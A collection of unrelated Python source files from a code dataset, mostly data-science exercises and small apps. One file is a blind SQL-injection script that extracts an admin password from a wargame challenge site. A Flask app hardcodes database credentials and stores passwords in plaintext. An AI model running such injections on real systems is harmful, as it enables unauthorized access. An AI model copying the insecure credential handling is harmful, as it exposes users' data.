np.fromfile(\"AI_1960_2010.bin\").reshape(nrows, ncols)\n petx = np.fromfile(\"PET_1960_2010.bin\").reshape(nrows, ncols)\n\n for p in places:\n\n r = np.where(latitudes==lats_neededx[p])[0][0]\n c = np.where(longitudes==lons_neededx[p])[0][0]\n\n # Cape Trib is in the sea at this resolution, so take the adjoining\n # pixel\n if p.strip() == \"Cape Tribulation Crane\":\n c -= 1\n #print(p.strip(), r, c, lats_neededr[p], lons_neededr[p], lats_neededx[p], lons_neededx[p])\n # get elevation\n e = requests.get('http://api.geonames.org/gtopo30JSON?lat=%f&lng=%f&username=mdekauwe' % (lats_neededr[p], lons_neededr[p]))\n elev = e.json()['gtopo30']\n\n s = \"%s,%s,%s,%s,%s,%s,%s,%s\" % (p.strip(), lats_neededr[p],\n lons_neededr[p], elev, matx[r,c],\n mapx[r,c], aix[r,c], petx[r,c])\n print(s, end=\"\\n\", file=fp)\n\n fp.close()\n\ndef x_round(x):\n # Need to round to nearest .25 or .75 to match the locations in CRU\n val = round(x * 4.0) / 4.0\n valx = str(val).split(\".\")\n v1 = valx[0]\n v2 = valx[1]\n\n if v2 <= \"25\":\n v2 = \"25\"\n else:\n v2 = \"75\"\n valx = float(\"%s.%s\" % (v1, v2))\n\n return (valx)\n\nif __name__ == \"__main__\":\n\n main()\n","sub_path":"extract_site_MAP_MAT_AI_elevation.py","file_name":"extract_site_MAP_MAT_AI_elevation.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"62410949","text":"##########################\r\n#\r\n# Author: Mitesh Khadgi\r\n# Date: 03/24/2019\r\n#\r\n##########################\r\n\r\nimport os\r\nimport re\r\nimport sys\r\nimport time\r\nimport string\r\nfrom numpy import *\r\n\r\n#learning rate value.\r\neta = 0.1\r\n#number of iterations for weightMatrix computation.\r\nnumOfIterations = 100\r\n\r\ndef readAllFiles(path):\r\n allWordsList = []\r\n dicFileWords = {}\r\n files = os.listdir(path)\r\n for file in files:\r\n f = open(path + \"/\" + file, encoding=\"ISO-8859-1\")\r\n words_list = f.read()\r\n words_list = re.sub('[^0-9a-zA-Z]', ' ', words_list)\r\n words_list = words_list.strip().split()\r\n dicFileWords[file] = words_list\r\n allWordsList.extend(words_list)\r\n return allWordsList, dicFileWords\r\n\r\ndef setLabels(numSpamFile, numHamFile):\r\n ClassLabel = []\r\n for i in range(numSpamFile):\r\n ClassLabel.append(0)\r\n for j in range(numHamFile):\r\n ClassLabel.append(1)\r\n return ClassLabel\r\n\r\ndef attributeValue(allWords, dict):\r\n attributeValList = []\r\n for i in dict:\r\n attrVal = [0] * (len(allWords)) #Initialize the size of the list - 'attrVal'.\r\n for word in allWords:\r\n if word in dict[i]:\r\n attrVal[allWords.index(word)] = 1\r\n attrVal.insert(0,1) #Considering x0 attribute equal to 1.\r\n attributeValList.append(attrVal)\r\n return attributeValList\r\n\r\ndef sigmoid(x):\r\n result = 1.0/(1 + exp(-x))\r\n return result\r\n\r\ndef updateWeights(lamb, trainList, trainLabels):\r\n attributeMatrix = matrix(trainList)\r\n finalLabelMatrix = matrix(trainLabels).transpose()\r\n columns = shape(attributeMatrix)[1]\r\n weightMatrix = zeros((columns,1)) #Initialize the weightMatrix with zeros with columns as number of rows.\r\n for i in range(numOfIterations):\r\n sigma = sigmoid(attributeMatrix*weightMatrix)\r\n actual = finalLabelMatrix\r\n predicted = sigma\r\n yerror = actual - predicted\r\n weightMatrix = weightMatrix + eta * (attributeMatrix.transpose()*yerror - lamb*weightMatrix)\r\n return weightMatrix\r\n\r\n\r\ndef classifyLabel(updatedWeight, testList, numTestSpam, numTestHam):\r\n attributeTestMatrix = matrix(testList)\r\n sum = attributeTestMatrix * updatedWeight\r\n totalTestSamples = numTestSpam + numTestHam\r\n correctPred = 0\r\n hamCorrectPred = 0\r\n spamCorrectPred = 0\r\n hamIncorrectPred = 0\r\n spamIncorrectPred = 0\r\n\r\n for i in range(numTestSpam):\r\n if sum[i][0] < 0.0:\r\n correctPred += 1\r\n spamCorrectPred += 1\r\n else:\r\n spamIncorrectPred += 1\r\n for j in range(numTestSpam+1,totalTestSamples):\r\n if sum[j][0] > 0.0:\r\n correctPred += 1\r\n hamCorrectPred += 1\r\n else:\r\n hamIncorrectPred += 1\r\n\r\n hamTotal = hamCorrectPred + hamIncorrectPred\r\n spamTotal = spamCorrectPred + spamIncorrectPred\r\n hamAccuracy = round(100.0 * hamCorrectPred/hamTotal, 2)\r\n spamAccuracy = round(100.0 * spamCorrectPred/spamTotal, 2)\r\n combinedAccuracy = round(100.0 * correctPred/totalTestSamples, 2)\r\n return sum, hamAccuracy, spamAccuracy, combinedAccuracy\r\n\r\ndef main():\r\n\r\n print(\"\\nStarted simulation at 0 seconds\\n\")\r\n print(\"Please wait to compute the HAM and SPAM accuracies...\\n\")\r\n start = time.time()\r\n\r\n #Input 2 arguments as train folder and test folder.\r\n trainFolder = str(sys.argv[1])\r\n testFolder = str(sys.argv[2])\r\n\t\r\n #Get all the training folder filenames from the ham folder.\r\n trainHamPath = trainFolder+'/ham'\r\n\r\n #Get all the training folder filenames from the spam folder.\r\n trainSpamPath = trainFolder+'/spam'\r\n\r\n #Get all the test folder filenames from the ham folder.\r\n testHamPath = testFolder+'/ham'\r\n\t\r\n #Get all the test folder filenames from the spam folder.\r\n testSpamPath = testFolder+'/spam'\r\n\r\n #lambda value (typical value = 0.001).\r\n lamb = float(sys.argv[3])\r\n\r\n #Read the SPAM and HAM training data set and, extract each word in a list for each SPAM and HAM training data file\r\n trainSpamList, trainSpamDict = readAllFiles(trainSpamPath)\r\n trainHamList, trainHamDict = readAllFiles(trainHamPath)\r\n\r\n #Read the SPAM and HAM test data set and, extract each word in a list for each SPAM and HAM test data file\r\n testSpamList, testSpamDict = readAllFiles(testSpamPath)\r\n testHamList, testHamDict = readAllFiles(testHamPath)\r\n\r\n #Get all the unique words from SPAM and HAM in a list.\r\n allWords = list(set(trainSpamList)|set(trainHamList))\r\n #Get all the words from SPAM and HAM training data set in a dictionary with key values as filename.\r\n allWordsTrain = {**trainSpamDict, **trainHamDict}\r\n #Get all the words from SPAM and HAM test data set in a dictionary with key values as filename.\r\n allWordsTest = {**testSpamDict, **testHamDict}\r\n\r\n #Compute the number of SPAM and HAM - training and test data sets.\r\n [numTrainSpam, numTrainHam, numTestSpam, numTestHam] = [len(trainSpamDict), len(trainHamDict), len(testSpamDict), len(testHamDict)]\r\n print(\"Total number of training samples\\t: \", numTrainSpam+numTrainHam)\r\n print(\"Total number of test samples\\t\\t: \", numTestSpam+numTestHam, \"\\n\")\r\n #Set all the labels as SPAM first as '0' and HAM second as '1' in this particular order.\r\n trainLabels = setLabels(numTrainSpam, numTrainHam)\r\n\r\n #Compare each word from the allWords with the allWordsTrain word list, and if the word exists in the training words list, store '1' in the list, otherwise store '0' in the list.\r\n trainList = attributeValue(allWords, allWordsTrain)\r\n #Compare each word from the allWords with the allWordsTest word list, and if the word exists in the test words list, store '1' in the list, otherwise store '0' in the list.\r\n testList = attributeValue(allWords, allWordsTest)\r\n\t\r\n #Compute weights using learning rate as 'eta' and regularization parameter as 'lamb' using Gradient Ascent with L2 regularization.\r\n updatedWeight = updateWeights(lamb, trainList, trainLabels)\r\n #Classify label to the provided test data set and return the number of correct predictions with correct predictions for SPAM and HAM separately to calculate the accuracies for SPAM and HAM with combined accuracy.\r\n sum, hamAccuracy, spamAccuracy, combinedAccuracy = classifyLabel(updatedWeight, testList, numTestSpam, numTestHam)\r\n\r\n print(\"--------------------------------------------------\")\r\n print(\"Accuracy of HAM\\t\\t\\t\\t: \", str(hamAccuracy) + \" %\")\r\n print(\"Accuracy of SPAM\\t\\t\\t: \", str(spamAccuracy) + \" %\")\r\n print(\"Combined Accuracy of HAM and SPAM\\t: \", str(combinedAccuracy) + \" %\")\r\n print(\"--------------------------------------------------\")\r\n\r\n end = time.time()\r\n elapsed = end - start\r\n print(\"\\nCurrent simulation took %f seconds to complete.\" % elapsed)\r\n\r\n print(\"\\nThank You ! Program ran Successfully.\")\r\n\t\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"LR.py","file_name":"LR.py","file_ext":"py","file_size_in_byte":6966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"398814641","text":"'''\n给定一个double类型的浮点数base和int类型的整数exponent。\n求base的exponent次方。\n保证base和exponent不同时为0\n'''\n\nclass Solution_1:\n def Power(self, base, exponent):\n # write code here\n if base==0 and exponent==0:\n return 0\n if exponent == 0:\n return 1\n if exponent == 1:\n return base\n baseOfEx = 1\n if exponent > 1:\n for _ in range(exponent):\n baseOfEx = baseOfEx * base\n else:\n if base == 0:\n return 0\n else:\n for _ in range(-exponent):\n baseOfEx = baseOfEx / base\n \n return baseOfEx\n\nclass Solution_2:\n def Power(self, base, exponent):\n def pow_with_unsigned(base, exponent):\n if base==0 and exponent==0:\n return 0\n if exponent == 0:\n return 1\n if exponent == 1:\n return base\n result = pow_with_unsigned(base, exponent>>1)\n result *= result\n if exponent & 1 == 1:\n result *= base\n\n return result\n \n if exponent < 0:\n if base == 0:\n return 0\n else:\n return 1 / pow_with_unsigned(base, -exponent)\n else:\n return pow_with_unsigned(base, exponent)\n\n ","sub_path":"src/16.数值的整数次方-代码的完整性.py","file_name":"16.数值的整数次方-代码的完整性.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"544597105","text":"# -*- coding: utf-8 -*-\n\"\"\"\n/***************************************************************************\n QGIS plugin to integrate Point Clouds from LIDAR or Photogrammetry\n copyright : (C) David Hernandez Lopez\n email : david.hernandez@uclm.es\n ***************************************************************************/\n\"\"\"\n\n# Import PyQt5 classes\nfrom PyQt5 import uic\nfrom PyQt5 import QtWidgets\n\n# Import Python classes\nimport os\n\nimport sys\nsys.path.append(os.path.dirname(__file__))\n# This loads your .ui file so that PyQt can populate your plugin with the elements from Qt Designer\nFORM_CLASS, _ = uic.loadUiType(os.path.join(os.path.dirname(__file__),\n 'point_cloud_3d_about_qdialog.ui'),\n resource_suffix='')\n\nclass AboutQDialog(QtWidgets.QDialog,\n FORM_CLASS):\n def __init__(self,\n parent=None):\n \"\"\"Constructor.\"\"\"\n super(AboutQDialog, self).__init__(parent)\n # Set up the user interface from Designer through FORM_CLASS.\n # After self.setupUi() you can access any designer object by doing\n # self., and you can use autoconnect slots - see\n # http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html\n # #widgets-and-dialogs-with-auto-connect\n self.setupUi(self)","sub_path":"point_cloud_3d_about_qdialog.py","file_name":"point_cloud_3d_about_qdialog.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"659133","text":"import requests\n\nURL = 'https://webhacking.kr/challenge/bonus-1/index.php?id=admin&pw='\nTRUE_PHRASE = 'wrong password'\n\ndef query(payload):\n r = requests.get(URL + payload)\n Content = r.text\n return TRUE_PHRASE in Content\n\n\ndef find_pw_length():\n pw_len = 1\n while query(\"' or id='admin' and length(pw)={}%23\".format(pw_len)) is False:\n pw_len += 1\n print('pw_len: {}'.format(pw_len))\n return pw_len\n\ndef find_pw():\n pw_len = find_pw_length()\n pw = ''\n for pos in range(1, pw_len + 1):\n for character in range(0, 128):\n if query(\"' or id='admin' and ord(substr(pw,{},1))={}%23\".format(pos, character)) is True:\n pw += chr(character)\n break\n print('pw: {}'.format(pw))\n\nfind_pw()","sub_path":"pw.py","file_name":"pw.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"75351321","text":"#!/usr/bin/env python3\n\nimport random, os\n\nanswers = {'Alabama': 'Montgomery', 'Alaska': 'Juneau', 'Arizona': 'Phoenix',\n 'Arkansas': 'Little Rock', 'California': 'Sacramento', 'Colorado': 'Denver',\n 'Connecticut': 'Hartford', 'Delaware': 'Dover', 'Florida': 'Tallahassee',\n 'Georgia': 'Atlanta', 'Hawaii': 'Honolulu', 'Idaho': 'Boise', 'Illinois':\n 'Springfield', 'Indiana': 'Indianapolis', 'Iowa': 'Des Moines', 'Kansas':\n 'Topeka', 'Kentucky': 'Frankfort', 'Louisiana': 'Baton Rouge', 'Maine':\n 'Augusta', 'Maryland': 'Annapolis', 'Massachusetts': 'Boston', 'Michigan':\n 'Lansing', 'Minnesota': 'Saint Paul', 'Mississippi': 'Jackson', 'Missouri':\n 'Jefferson City', 'Montana': 'Helena', 'Nebraska': 'Lincoln', 'Nevada':\n 'Carson City', 'New Hampshire': 'Concord', 'New Jersey': 'Trenton', 'New Mexico': 'Santa Fe', 'New York': 'Albany', 'North Carolina': 'Raleigh',\n 'North Dakota': 'Bismarck', 'Ohio': 'Columbus', 'Oklahoma': 'Oklahoma City',\n 'Oregon': 'Salem', 'Pennsylvania': 'Harrisburg', 'Rhode Island': 'Providence',\n 'South Carolina': 'Columbia', 'South Dakota': 'Pierre', 'Tennessee':\n 'Nashville', 'Texas': 'Austin', 'Utah': 'Salt Lake City', 'Vermont':\n 'Montpelier', 'Virginia': 'Richmond', 'Washington': 'Olympia', 'West Virginia': 'Charleston', 'Wisconsin': 'Madison', 'Wyoming': 'Cheyenne'}\n\n\ntester = list(answers.items())\n\n# print(tester) #debug\n\nrandom.shuffle(tester)\n\n# print(tester) #debug\n\nquestion_file = open('ch8_questions.txt','w')\nanswer_file = open('ch8_answers.txt', 'w')\n\ndef dummyAnswers(capsDict, state):\n fourChoice = []\n # print(fourChoice) #debug\n fourChoice.append(capsDict[state])\n # print(fourChoice) #debug\n caps_list = list(capsDict.values())\n random.shuffle(caps_list)\n # print(caps_list) #debug\n for i in range(len(capsDict)):\n # print(len(capsDict))\n # print(caps_list[i]) #debug\n if caps_list[i] == fourChoice[0]:\n continue\n else:\n # fourChoice += caps_list[i] #This for some reason adds just the ith character of the \n fourChoice += [caps_list[i]] #This adds the string as a new entry in the list\n if len(fourChoice) >= 4:\n break\n # print(fourChoice) #debug\n # random.shuffle(fourChoice)\n return fourChoice\n\nprint(dummyAnswers(answers, 'California')) #debug\n\nj = 1\nfor a, b in tester:\n selected_answers = dummyAnswers(answers, a)\n random.shuffle(selected_answers)\n question_file.write(str(j) + '. What is the capital of ' + a + '?\\n')\n h = 0\n for k in selected_answers:\n if h >= 3:\n question_file.write('\\tD. ' + k + '\\n')\n if k == b:\n answer_file.write(str(j) + ') D. ' + k + '\\n')\n elif h == 2:\n question_file.write('\\tC. ' + k)\n if k == b:\n answer_file.write(str(j) + ') C. ' + k + '\\n')\n elif h == 1:\n question_file.write('\\tB. ' + k)\n if k == b:\n answer_file.write(str(j) + ') B. ' + k + '\\n')\n elif h == 0:\n question_file.write('\\tA. ' + k)\n if k == b:\n answer_file.write(str(j) + ') A. ' + k + '\\n')\n h += 1\n j += 1\n\nquestion_file.close()\nanswer_file.close()\n\n# for q, a in answers.items():\n# # os.write('What is the capital of ' + q + '?','questions.txt')\n# print('What is the capital of ' + q + '?')\n# choices = dummyAnswers(answers, q) #debug\n\n\n\n\n \n\n#choose a random three captials to be the other answers\n\n#turn the list of the correct answer and three random capitals to be a randomized list\n\n#make a dictionary of four items, with the key being A, B, C, or D and the value being the capital assigned to it\n\n#print the question, along with the four answers, using A, B, C, D\n\n#repeat, such that a list of 35\n\n\"\"\"OR an alternate method would be to create a dictionary with {'state':{'correct answer',{'random answer 1', 'random answer 2', 'random answer 3'}}}.\nHowever, as I write this, I see that this might make things overly complex, as I'm still not an expert at nexted dictionaries\n\"\"\"\n\n# os.close('questions.txt')\n\n","sub_path":"2017_Summer/ch8_geography_quiz_v2.py","file_name":"ch8_geography_quiz_v2.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"253133552","text":"import numpy as np\r\nimport pandas as pd\r\nfrom matplotlib import pyplot as plt\r\nimport seaborn as sns\r\n\r\ndf = pd.read_csv(\r\n r'C:\\Users\\vidya\\OneDrive\\Desktop\\Python_coding_practice_Datasets\\PythonDataSets\\Feature_selection_Gs\\mercedesebenz\\train.csv',\r\n usecols=['X0', 'X1', 'X2', 'X3', 'X4', 'X5', 'X6', 'X8'])\r\nprint(df.columns)\r\nprint(df.shape)\r\n\r\n# print(df['X0'].value_counts())\r\nfor col in df.columns:\r\n print(col, ':', len(df[col].unique()))\r\n pass\r\n\r\n# print(df['X0'].value_counts().sort_values(ascending=False))\r\ntop_15_X0 = df['X0'].value_counts().sort_values(ascending=False).head(15).index\r\ntop_15_X0 = list(top_15_X0)\r\nfor label in top_15_X0:\r\n a = 'X0_' + label\r\n df[a] = np.where(df['X0'] == label, 1, 0)\r\n top_15_X0[top_15_X0.index(label)] = a\r\nprint(df[['X0'] + top_15_X0].head(2))\r\n\r\ntop_15_X1 = df['X1'].value_counts().sort_values(ascending=False).head(15).index\r\ntop_15_X1 = list(top_15_X1)\r\nfor label in top_15_X1:\r\n a = 'X1_' + label\r\n df[a] = np.where(df['X1'] == label, 1, 0)\r\n top_15_X1[top_15_X1.index(label)] = a\r\nprint(top_15_X1)\r\nprint(df[['X1'] + top_15_X1].head(2))\r\n\r\n\r\n\r\ntop_15_X2 = df['X2'].value_counts().sort_values(ascending=False).head(15).index\r\ntop_15_X2 = list(top_15_X2)\r\nprint(top_15_X2)\r\nfor label in top_15_X2:\r\n a = 'X2_' + label\r\n df[a] = np.where(df['X2'] == label, 1, 0)\r\n top_15_X2[top_15_X2.index(label)] = a\r\nprint(df[['X2'] + top_15_X2].head(2))\r\n\r\ntop_7_X3 = df['X3'].value_counts().sort_values(ascending=False).head(7).index\r\ntop_7_X3 = list(top_7_X3)\r\nfor label in top_7_X3:\r\n a = 'X3_'+label\r\n df[a] = np.where(df['X3'] == label, 1, 0)\r\n top_7_X3[top_7_X3.index(label)] = a\r\nprint(df[['X3'] + top_7_X3].head(2))\r\n\r\n\r\ntop_4_X4 = df['X4'].value_counts().sort_values(ascending=False).head(4).index\r\ntop_4_X4 = list(top_4_X4)\r\n# print(top_4_X4)\r\nfor label in top_4_X4:\r\n a = 'X4_' + label\r\n df[a] = np.where(df['X4'] == label, 1, 0)\r\n top_4_X4[top_4_X4.index(label)] = a\r\nprint(df[['X4'] + top_4_X4].head(2))\r\n\r\n\r\n\r\n\r\ntop_20_X5 = df['X5'].value_counts().sort_values(ascending=False).head(20).index\r\ntop_20_X5 = list(top_20_X5)\r\nfor label in top_20_X5:\r\n a = 'X5_' + label\r\n df[a] = np.where(df['X5'] == label, 1, 0)\r\n top_20_X5[top_20_X5.index(label)] = a\r\nprint(df[['X5'] + top_20_X5].head(2))\r\n\r\n\r\ntop_7_X6 = df['X6'].value_counts().sort_values(ascending=False).head(7).index\r\ntop_7_X6 = list(top_7_X6)\r\n# print(top_7_X6)\r\nfor label in top_7_X6:\r\n a = 'X6_' + label\r\n df[a] = np.where(df['X6'] == label, 1, 0)\r\n top_7_X6[top_7_X6.index(label)] = a\r\nprint(df[['X6'] + top_7_X6].head(2))\r\n\r\ntop_15_X8 = df['X8'].value_counts().sort_values(ascending=False).head(15).index\r\ntop_15_X8 = list(top_15_X8)\r\n# print(top_15_X8)\r\nfor label in top_15_X8:\r\n a = 'X8_' + label\r\n df[a] = np.where(df['X8'] == label, 1, 0)\r\n top_15_X8[top_15_X8.index(label)] = a\r\nprint(df[['X8'] + top_15_X8].head(2))\r\n\r\n\r\nprint(df.columns)\r\nprint(len(df.columns))\r\ndf.drop(['X0', 'X1', 'X2', 'X3', 'X4', 'X5', 'X6', 'X8'],axis=1, inplace=True)\r\n\r\nprint(len(df.columns))\r\nprint(df.columns)\r\ny= pd.read_csv(\r\n r'C:\\Users\\vidya\\OneDrive\\Desktop\\Python_coding_practice_Datasets\\PythonDataSets\\Feature_selection_Gs\\mercedesebenz\\train.csv',\r\n usecols=['y'])\r\nprint(df.shape, y.shape)\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train, x_test, y_train, y_test = train_test_split(df, y, test_size=0.2, random_state=12)\r\nprint(x_train.shape, x_test.shape)\r\nimport math\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.metrics import r2_score,mean_squared_error\r\nLR= LinearRegression().fit(x_train, y_train)\r\ny_train_predict = LR.predict(x_train)\r\nprint('r2 score: ', r2_score(y_train, y_train_predict))\r\nprint('RMSE: ', math.sqrt(mean_squared_error(y_train, y_train_predict)))\r\n\r\ny_test_predict = LR.predict(x_test)\r\nprint('r2 score: ', r2_score(y_test, y_test_predict))\r\nprint('RMSE: ', math.sqrt(mean_squared_error(y_test, y_test_predict)))\r\ncoef = LR.coef_\r\n#print('Coefficients for linear regression: ', coef)\r\nprint('Intercept for linear regression: ', LR.intercept_)\r\nprint('Coefficient of LR model')\r\nl = list(coef)[0]\r\nl = [round(i, 3) for i in l]\r\nprint(len(l), l)\r\nl1 =[i for i in range(len(l))]\r\nprint(len(l1), l1)\r\nplt.bar(l1, l)\r\nplt.title('Variable importance for categorical variables')\r\nplt.xticks(range(len(l1)), list(df.columns))\r\nplt.ylim(-40,40)\r\nplt.show()\r\n\r\nprint('Vraibles with sorted values')\r\n\r\nl_sort_value = sorted(l)\r\nprint(l_sort_value)\r\nl_sort_arg = np.argsort(l)\r\nprint(l_sort_arg)\r\nprint(l[l_sort_arg[0]])\r\nprint(len(df.columns))\r\n\r\nfor i in range(len(df.columns)):\r\n print('Feature ',(df.columns[l_sort_arg[i]]), ': ', l[l_sort_arg[i]])\r\n\r\nd1 = df[['X3_c', 'X3_f', 'X3_a', 'X3_d', 'X3_g',\r\n 'X3_e', 'X3_b', 'X4_d', 'X4_a', 'X4_b', 'X4_c']]\r\ndata = pd.concat([d1, y])\r\nprint(data.shape)\r\ncorre_m = data.corr()\r\nsns.heatmap(corre_m, annot=True)\r\nplt.show()\r\n\r\n","sub_path":"ML Concepts/One_Hot_Encoding_with_Many_variables.py","file_name":"One_Hot_Encoding_with_Many_variables.py","file_ext":"py","file_size_in_byte":4939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"376679262","text":"import numpy as np\n\nclass DataLoader:\n\n def __init__(self, classes, text_to_vector, max_length):\n self.text_to_vector = text_to_vector\n self.max_length = max_length\n self.classes = []\n self.class_to_id = dict()\n for i, c in enumerate(classes):\n self.class_to_id[c] = i\n\n def get_batch(self, path, batch_size):\n x = []\n y = []\n while 1:\n f = open(path, \"r\", encoding=\"utf-8\")\n for line in f:\n if len(x) < batch_size:\n self._parse_line(line, x, y)\n else:\n yield np.array(x), np.array(y)\n x = []\n y = []\n f.close()\n\n def load(self, path, max_size=None):\n x = []\n y = []\n with open(path, \"r\", encoding=\"utf-8\") as f:\n for i, line in enumerate(f):\n if max_size and i > max_size:\n break\n else:\n self._parse_line(line, x, y)\n return np.array(x), np.array(y)\n\n def embed(self, text):\n return self._generalize_length(self.text_to_vector(text))\n\n def _parse_line(self, line, x, y):\n strs = line.split('\\t')\n label = strs[0]\n text = strs[1]\n if label in self.class_to_id:\n y.append(self.class_to_id[label])\n vec_x = self.embed(text)\n x.append(vec_x)\n\n def _generalize_length(self, l):\n if len(l) > self.max_length:\n l = l[:self.max_length]\n else:\n l.extend([0]*(self.max_length-len(l)))\n return l","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"5950997","text":"# https://www.hackerrank.com/challenges/re-split/problem\nregex_pattern = r\"[.,]\"\t# Do not delete 'r'.\n\nimport re\nprint(\"\\n\".join(re.split(regex_pattern, input())))\n\n\n# Case that handles two consecutive delimiters \nr\"\"\"\nimport re\nprint(*filter(None, re.split(r'[.,]+', input())), sep='\\n')\nfilter() returns every element in the second argument for which the function in the first argument evaluates as true.\n Using None as the first argument removes all items that are equivalent to false. The latter two test cases have \n consecutive delimiters, so using re.split() creates empty elements in the list. filter() returns the list without those \n empty elements.\n\"\"\"","sub_path":"HackerRank/PythonChallenges/re_split.py","file_name":"re_split.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"59539651","text":"import codecs\r\n\r\nimport flask\r\nfrom flask import Flask, render_template,request\r\nimport pyodbc\r\nimport csv\r\n\r\n\r\napp = flask.Flask(__name__)\r\napp.config[\"DEBUG\"] = True\r\n\r\n\r\n@app.route('/')\r\ndef login():\r\n return render_template(\"login.html\")\r\n\r\n@app.route('/dashboard')\r\ndef tableaudashboard():\r\n return render_template(\"tableau.html\")\r\n\r\n@app.route('/register')\r\ndef register():\r\n return render_template(\"register.html\")\r\n\r\n@app.route('/loginValidation',methods=['POST'])\r\ndef login_validation():\r\n error=None\r\n conn = pyodbc.connect(\r\n 'DRIVER={SQL Server};SERVER=tcp:azurecloudassign.database.windows.net,1433;DATABASE=azurecloud;UID=azureadmin;PWD=Admin@123;')\r\n cursor = conn.cursor()\r\n username=request.form['Uname']\r\n password=request.form['Pass']\r\n cursor.execute(\"\"\"SELECT * FROM azurecloud.dbo.user_details where user_name = ? and password = ? \"\"\",[username,password])\r\n usersss=cursor.fetchone()\r\n conn.commit()\r\n if usersss != None :\r\n sql_select_query = \"select h.hshd_num, t.basket_num,t.product_num,t.purchase,p.department,p.commodity,t.spend,t.units,t.store_r,t.week_num,t.year,h.L,h.age_range,h.marital,h.income_range,h.homeowner,h.hshd_composition,h.hh_size,h.children from households as h,transactions as t , products as p where h.hshd_num=t.hshd_num and t.product_num=p.product_num and h.hshd_num=10\"\r\n cursor.execute(sql_select_query)\r\n data = cursor.fetchall()\r\n conn.close()\r\n return render_template(\"homepage.html\", hshddata=data)\r\n else:\r\n error=\"Incorrect username or password\"\r\n return render_template('login.html',error=error)\r\n\r\n@app.route('/addUser',methods=['POST'])\r\ndef add_user():\r\n msg=\"Registered Sucessfully. Please login to continue\"\r\n conn = pyodbc.connect(\r\n 'DRIVER={SQL Server};SERVER=tcp:azurecloudassign.database.windows.net,1433;DATABASE=azurecloud;UID=azureadmin;PWD=Admin@123;')\r\n c = conn.cursor()\r\n fnameu=request.form['Fname']\r\n lnameu=request.form['Lname']\r\n emailu=request.form['email']\r\n usernameu=request.form['username']\r\n pswu=request.form['Pass']\r\n c.execute(\"\"\"SELECT * FROM azurecloud.dbo.user_details WHERE user_name=? \"\"\",(usernameu,))\r\n users=c.fetchone()\r\n if users==None:\r\n c.execute(\"\"\"INSERT INTO azurecloud.dbo.user_details (first_name,last_name,email,user_name,password) VALUES (?,?,?,?,?)\"\"\",(fnameu,lnameu,emailu,usernameu,pswu))\r\n conn.commit()\r\n conn.close()\r\n msg=\"Registration Successful!\"\r\n return render_template(\"login.html\",msg=msg)\r\n else:\r\n error=\"Username already exists. Please try with different Username\"\r\n conn.close()\r\n return render_template(\"register.html\",error=error)\r\n\r\n\r\n@app.route('/getrows', methods=['GET','POST'])\r\ndef getRows():\r\n hhnum=request.args.get('search')\r\n # hhnum=request.form['search']\r\n print(hhnum)\r\n conn = pyodbc.connect(\r\n 'DRIVER={SQL Server};SERVER=tcp:azurecloudassign.database.windows.net,1433;DATABASE=azurecloud;UID=azureadmin;PWD=Admin@123;')\r\n cursor = conn.cursor()\r\n\r\n #sql_select_query = \"select h.hshd_num, t.basket_num,t.product_num,t.purchase,p.department,p.commodity,t.spend,t.units,t.store_r,t.week_num,t.year,h.L,h.age_range,h.marital,h.income_range,h.homeowner,h.hshd_composition,h.hh_size,h.children from households as h,transactions as t , products as p where h.hshd_num=t.hshd_num and t.product_num=p.product_num and h.hshd_num=?\"\r\n cursor.execute(\"\"\"select h.hshd_num, t.basket_num,t.product_num,t.purchase,p.department,p.commodity,t.spend,t.units,t.store_r,t.week_num,t.year,h.L,h.age_range,h.marital,h.income_range,h.homeowner,h.hshd_composition,h.hh_size,h.children from households as h,transactions as t , products as p where h.hshd_num=t.hshd_num and t.product_num=p.product_num and h.hshd_num=?\"\"\",(hhnum,))\r\n data=cursor.fetchall()\r\n conn.close()\r\n return render_template(\"homepage.html\",hshddata=data)\r\n\r\ndef decode_utf8(input_iterator):\r\n for l in input_iterator:\r\n yield l.decode('utf-8')\r\n\r\n@app.route('/insertdata', methods=['GET', 'POST'])\r\ndef insertCSVData():\r\n tablename= None\r\n errmsg=None\r\n fileName = request.files['file']\r\n conn = pyodbc.connect(\r\n 'DRIVER={SQL Server};SERVER=tcp:azurecloudassign.database.windows.net,1433;DATABASE=azurecloud;UID=azureadmin;PWD=Admin@123;')\r\n cursor = conn.cursor()\r\n reader = csv.reader(codecs.iterdecode(request.files['file'], 'utf-8'))\r\n next(reader)\r\n for row in reader:\r\n if 'products' in fileName.filename:\r\n tablename='PRODUCTS'\r\n cursor.execute('INSERT INTO azurecloud.dbo.products(PRODUCT_NUM, DEPARTMENT, COMMODITY,BRAND_TY,NATURAL_ORGANIC_FLAG) VALUES(?,?,?,?,?)',row)\r\n elif 'households' in fileName.filename:\r\n tablename='HOUSEHOLDS'\r\n cursor.execute('INSERT INTO azurecloud.dbo.households(HSHD_NUM,L,AGE_RANGE,MARITAL,INCOME_RANGE,HOMEOWNER,HSHD_COMPOSITION,HH_SIZE,CHILDREN) VALUES(?,?,?,?,?,?,?,?,?)',row)\r\n elif 'transactions' in fileName.filename:\r\n tablename='TRANSACTIONS'\r\n cursor.execute('INSERT INTO 